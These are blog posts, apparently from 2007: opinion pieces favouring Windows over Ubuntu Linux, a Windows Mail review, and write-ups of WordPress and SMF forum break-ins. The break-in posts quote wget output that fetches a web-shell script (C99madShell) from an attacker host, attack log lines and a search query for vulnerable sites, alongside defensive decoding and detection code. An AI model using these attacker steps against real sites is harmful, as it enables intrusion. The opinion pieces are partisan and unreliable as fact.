Ubuntu Concedes Defeat, Canonical Throws in The Towel

While it’s not quite as dramatic as the title might suggest…

It is true. As it was a year ago, and still is today.

The success of Ubuntu Linux and Canonical is only one part truth… If success = being popular.

If you take your news from digg.com, cnet, or any other tech friendly site on the net, you will read one thing over and over again, every day of the year: Ubuntu is taking over the world, Vista does not work, and Microsoft is dying.

The facts are that 1) Ubuntu Linux is another popular Linux distribution (at the head of a long line of distros that have seen their peaks), 2) Vista is the best OS so far, works well, and is a major seller, and 3) Microsoft revenues have been trending upward for as long as I can remember.

Consider also the facts that digg.com (net’s biggest anti-MS site) makes all its money from a Microsoft partnership [after Google dropped them], and that Ubuntu Linux is purely a product of Corporate sponsorship and development … and what do you have left?

It’s not “reality” because reality is not something that the pressure groups of self agendas can handle, and neither is the truth.

The truth is that 1) some people feel the need to be part of a group that needs to constantly reassure one another that “their way is the best way” and 2) tech sites need to drive traffic to generate ad revenues by spreading fear, uncertainty, and distrust.

Just today I was reading on a tech site how Canonical’s revenues are in the stratosphere. Right! Let’s see…

This is the same day Shuttleworth goes on to claim that Canonical is not cash positive (they are spending more than they are taking in) and it will take another 5 years of funding [Source]… At only a 10 million a year burn rate.

In other news, there is no money to be made on desktop Linux, but that’s okay, because everyone already knew that. Hindsight is always 20/20.

Windows Mail for Vista, Not As Bad As I Thought.

Having used Windows XP for the last several years, I’ve recently decided to migrate to Windows Vista after purchasing a Dell 530 quad core PC with a 24 inch LCD.

My choices were to:
1. Keep using Thunderbird
2. Migrate to Outlook [Office]
3. Or try the native Windows Vista Mail application [“Windows Mail” is the replacement for Outlook Express].

The choice of using Thunderbird was the simplest of them all… But I wanted to try something new. The stability issues and a non-modern UI were the other decisive factors at play.

In the end, Windows Mail was the winner. But not an easy one.

Here is what I have discovered, which should have been documented somewhere but is not.

a) There is no way to import mbox format mail from other Mail Clients.

I used a temporary IMAP folder to copy/move messages from one mail client to the other, to bypass the obvious underlying format issues.

b) All POP accounts go into the main Local Inbox folder.

If you want to structurally segment different POP accounts, you will need to create Local sub-folders and create message rules that are conditional on the specific account. I can make a case for or against this [if this is a feature or a limit].

c) Message Rules do not apply to IMAP folders.

And there is no setting to automatically copy/move messages from select IMAP folders or accounts to the Local Folders. Again, I can make a case for or against this [both ways].

d) The Spam filter does not automatically apply to IMAP accounts and folders even when “Synchronization Settings” are set to “All messages” [which downloads the entire message body].

You actually have to open the message for the spam filter to process it. Though I think it might act on the header data it receives, proactively, or perhaps even on the message body when you select “Work Offline”.

All in all, after using Windows Mail I’ve actually become fond of it. It’s a great app and integrates well with the system.

Gmail IMAP folders use a “/” path in their structure. Example: The All Mail folder is “[Gmail]/All Mail”. Windows Mail does not allow you to use this character to specify the special IMAP folders. It still works, but looks a little odd. There are ways to get around this if it bothers you.

Another Day, Another WordPress Hack.

It could have been worse.

A few weeks ago we were hit with an SMF v1.1.3 exploit just a few days after the release of v1.1.4. The intruder inserted a slew of hidden spam links into the main ‘index.php’ file.

It took me a day or two to detect the modifications. And in this short time period forums.devside.net, which has been online since 2003, with a healthy PageRank, had all its pages dropped from Google [with the exception of profiles and archives].

It’s a good thing I keep the forums on their own sub-domain, which Google treats more like a separate domain than anything else. An SE problem with the sub does not affect the main domain.

As a counter-measure to these “exploit app weakness, get shell, d/l script, profit” type of attacks, I have disabled most of the shell related PHP functions on the server.

And so I thought my problems were solved…

This time it’s my fault. I was running WordPress v2.2.2, with v2.2.3 having been released about a month ago. I’ve been checking the WP dashboard, but I must have missed it, or forgotten about it.

This time the intruder exploited one of many WP weaknesses, and inserted some type of a hidden “-1” post that was nothing more than an attachment to this particular shell-script, executed with URL ‘/blog/?poncheg’…

WordPress Hack 2

- - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-"
- - [08/Oct/2007:07:10:25 -0400] "GET / HTTP/1.0" 200 12071 "-" "-"
- - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-"
- - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera"
- - [08/Oct/2007:07:11:49 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1647 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:11:56 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "http://www.devside.net/blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
- - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://www.devside.net/blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
- - [08/Oct/2007:07:12:25 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1629 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:12:30 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"
...
- - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"

Luckily, in addition to the disabled PHP functions, I also had all my file/dir permissions under WP locked down, so it does not look like anything was modified. I still recreated the entire WP directory, just for safety’s sake, and had to manually go into the database and delete the hidden attachment/post.

It’s not a matter of if you are going to get hacked, it’s a matter of when. So keep those web apps patched!
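
The requests in the log excerpt above can be turned into routine log checks. This Python is an added example, not code from the original post: the indicator names, the sample lines, the 203.0.113.x / 198.51.100.x client addresses and the blog.example host are constructed, and the three rules are assumptions drawn from what stands out in that excerpt.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format.
LINE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def findings(line):
    """Return the indicator names (hypothetical labels) that one log line trips."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    url = urlsplit(m["target"])
    hits = []
    # Upload handler pointed at a post id that cannot exist, as in post_id=-1.
    negative_id = any(k == "post_id" and re.fullmatch(r"-\d+", v)
                      for k, v in parse_qsl(url.query, keep_blank_values=True))
    if m["method"] == "POST" and url.path.endswith("/wp-admin/upload.php") and negative_id:
        hits.append("upload-to-negative-post-id")
    # Bare keyword query on a page URL, as in /blog/?poncheg (no key=value pair).
    if url.query and "=" not in url.query and url.path.endswith("/"):
        hits.append("bare-keyword-query")
    # Admin or XML-RPC endpoint requested with neither referer nor user agent.
    if (m["referer"], m["agent"]) == ("-", "-") and re.search(r"/wp-admin/|/xmlrpc\.php$", url.path):
        hits.append("admin-hit-without-referer-or-agent")
    return hits

def triage(lines):
    """Map each client to the de-duplicated indicators it tripped, in first-seen order."""
    report = {}
    for line in lines:
        m = LINE.match(line)
        client = m["client"] if m else "?"
        for name in findings(line):
            if name not in report.setdefault(client, []):
                report[client].append(name)
    return report

# Constructed sample modelled on the excerpt; client addresses and host are placeholders.
SAMPLE = [
    '203.0.113.7 - - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-"',
    '203.0.113.7 - - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://blog.example/blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"',
    '203.0.113.7 - - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"',
    '203.0.113.7 - - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"',
    '198.51.100.20 - - [08/Oct/2007:07:13:02 -0400] "GET /blog/?p=41 HTTP/1.1" 200 9120 "http://blog.example/blog/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, names in triage(SAMPLE).items():
        print(client, ", ".join(names))
```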

All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on ‘fetching preview…’], only to come up to this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru...
Connecting to kotzilla.jino-net.ru||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those who do not know, the above is the output of wget, or an equivalent, downloading a script to your system. All of this is done via Apache, usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

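<?php
// Peel the nested eval(gzinflate(base64_decode('...'))) layers without executing any of them.
$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
// Capture only the base64 payload between the quotes of the outermost wrapper.
$pattern = '/^eval\(gzinflate\(base64_decode\(\'([^\');]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches)) {
    $string = gzinflate(base64_decode($matches[1]));
    $count++;
    echo "Decoded/Inflated: $count\n";
}
// What remains is the innermost layer, printed as text and never evaluated.
echo "$string";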

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

Not good!

Hack Shell 1

Hack Shell 2

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

- - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
- - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
- - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
- - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"

Final Analysis.
I’ve searched the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much of anything else.

Host name of is nzs.agh.edu.pl

- - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

- - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv: Gecko/20070914 Firefox/"
...
- - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
- - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
- - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
- - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"

Host name of is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.
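
The grep in Step 4 only finds files that carry that exact wrapper, and the spam links added to ‘index.php’ went unnoticed for a day or two. Comparing the deployed tree against an untouched copy of the same release surfaces both kinds of change. This Python is an added example, not code from the original post; it assumes a pristine copy of the release is available, and the directory layout and file contents it builds are constructed.

```python
import hashlib
import os

def digest_tree(root, suffixes=(".php",)):
    """Map each matching file (path relative to root) to its SHA-256 digest."""
    digests = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(folder, name)
                with open(path, "rb") as handle:
                    digests[os.path.relpath(path, root)] = hashlib.sha256(handle.read()).hexdigest()
    return digests

def compare(pristine_root, deployed_root):
    """List PHP files added, modified or removed relative to the pristine release copy."""
    good, live = digest_tree(pristine_root), digest_tree(deployed_root)
    return {
        "added": sorted(live.keys() - good.keys()),
        "modified": sorted(p for p in good.keys() & live.keys() if good[p] != live[p]),
        "removed": sorted(good.keys() - live.keys()),
    }

def build_demo(base):
    """Write a constructed two-file 'release' and a tampered deployment under base."""
    stub = "<?php // constructed stub\n"
    layout = {
        "pristine": {"index.php": stub, "Themes/index.php": stub},
        "deployed": {
            "index.php": stub + "<!-- constructed: hidden link block appended here -->\n",
            "Themes/index.php": stub,
            "Themes/readme.php": "<?php // constructed placeholder for a dropped file\n",
        },
    }
    for tree, files in layout.items():
        for rel, body in files.items():
            path = os.path.join(base, tree, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as handle:
                handle.write(body)
    return os.path.join(base, "pristine"), os.path.join(base, "deployed")

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as base:
        print(compare(*build_demo(base)))
```

Run from cron against the live docroot, a non-empty "added" or "modified" list is the signal to investigate before a search engine notices.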

Ubuntu and Dell, a Mismatch Made in a Place Called Hell [IdeaStorm].

I’m going to keep this one short and simple, and to the point.

And I’m not even going to write anything.

Why the Dell/Ubuntu Deal Won’t Improve Linux’s Market Share

When you take a few steps back from the furor and zealotry and take a close look at what’s happened here, you will quickly start to see the cracks. One problem is that Dell appears to be under the misguided impression that listening to the IdeaStorm community is the same as listening to customers. It’s not. Anyone can register and become an instant member of the IdeaStorm community. What Dell listened to wasn’t a cross-section of customers, but rather a pressure group.

There are a series of other pressure groups in operation on IdeaStorm right now, people who are putting their own agendas on the table and expecting Dell to carry them out

A wise and sound analysis that iterates everything mentioned here on the topic.

Ubuntu Kills Linux, Then Self, Dell Suspected of Foul Play.

I scream, you scream, we all scream for … DELL Ubuntu Linux?

*World* to Dell: We want desktop Linux!

Unless you’ve been living in a cave, you’ve probably heard the news:

The world wants Linux. And as we all know, the news can’t be wrong. Especially if it’s regurgitated over and over again on every tech site on the net.

Just one problem though…

This is Linux-fever journalism at its worst, and an example of a simple lie being easier for people to swallow than the complex truth.

Now I want you to take a deep breath at this point, because you’re about to get a sick feeling in your stomach. That feeling of utter hopelessness. And it’s going to come in shock waves, one after the other, over and over.

[You might want to stop reading at this point.]

Tsunami Wave #1.

And on Dell’s Ideastorm Web site, a staggering 41,210 users agreed with the thread, “Sell Linux PCs Worldwide — not only the United States”.

On another thread, 6,410 users agreed with the statement, “Make Dell Ubuntu PCs available to businesses and non-profits”.

They can’t even get the basic facts right…

When you vote on Dell’s IdeaStorm, your vote increases the total count by 10 points.

The reported figures so eminently talked about since day 1 are off by a factor of 10. That’s for every reported 10,000 users, only 1,000 votes were cast.

But don’t just stop there… Take into consideration that you get to register with a made up user name and password immediately, with no email confirmation or validation. You don’t even leave the page (thanks to JavaScript).

Log out, re-register again under the same exact IP address, and you get to vote once more, over and over.

The reported 100,000 users that started this mess in the first place on IdeaStorm, are at best 10,000 strong — assuming no manipulation was involved.

Not that the people doing the actual voting have any intention of getting a Ubuntu DELL anyways…

[While this quote is a joke, it sums up things quite nicely.]

I voted multiple times for Ubuntu on Dell’s ideaStorm so that others can have the opportunity to purchase it. As an Ubuntu advocate, I’ve done my part. It’s time for the consumers to do their part. Don’t blame me if consumers are too stupid to know what is best for them.

Tsunami Wave #2.

Dell has no intention of delivering Linux to the home user.

OEMs like Dell have razor thin margins. They live and die by the volume discounts, co-marketing funds, “Desktop Real Estate”, and leads provided by Microsoft.

The Ubuntu systems that Dell sells are nothing more than a type of a loss-leader designed to show the consumer that they are getting a better deal when buying the Windows counter-part… More features to select from, better promotions/deals, better components/upgrades, and sometimes cheaper upgrades.

If you’re part of the vast digg.com crowd that believes the US government perpetrated the 9/11 attacks, you’re probably also the type to believe that Dell will jeopardize its Microsoft relationship, and face the consequences, to sell an expected 20,000 Ubuntu systems [at a loss].

You don’t bite the hand that feeds you.

What’s Dell’s incentive here?… To generate publicity to further sell Windows Licenses and provide Microsoft with facts and figures to use in future campaigns.

More OEMs are cashing in on this profitable tactic every day.

Tsunami Wave #3.

By *pushing* Linux upon users that have no need for it, you are setting yourself up for failure.

The Microsoft Windows installed base is soon to cross the 1 Billion mark.

That user-base is very diverse: with different cultures, languages, and processes. Take into account everything Microsoft has had to work through by catering to everyone’s needs. Major roadblocks have been overcome. And what has Linux been put through on the Desktop? Relatively speaking… absolutely nothing.

Linux does not have a secret formula that makes it immune to growing pains. Switch the market share between Windows and Linux, and Linux will be downright unusable. From viruses, to backward compatibility issues, to UI problems, to everything else.

Let me state it one more time since it’s a point never mentioned: With an increasing market share, Linux will have the same exact growing pains and problems as Microsoft did and currently has.

Not to even mention that you are now catering to a mass that thinks the CD tray is a cup holder and the mouse is a foot pedal.

Landslide #1.

Vista Aiding Linux Desktop, Strategist Says

“Windows Vista has probably created the single biggest opportunity for the Linux desktop to take market share…”

How often do I hear this delusional statement in all its variations.

Vista has problems. So did Windows XP. As did Windows 2000. And 98, 95, 3.1. There _is_ a pattern here. It’s called SP1 [Service Pack 1]. After which every version mentioned took off.

The saying goes: if your first version is not horribly broken, you’ve waited too long to release it.

The current release of Vista has allowed Microsoft to get feedback from a very diverse user-base. Feedback that is priceless, that cannot be had any other way. How else is progress made?

You don’t raise your child in a plastic bubble.

History repeats itself, and just as Linux has not been able to make it to the Desktop since the promised year 2000, Windows users are also not migrating to Linux pastures in mythical herds. If anything, XP sales are up and Microsoft is readying to sell millions of Vista Licenses, of which an estimated 6 million are being sold each month.

Tell me I’m wrong.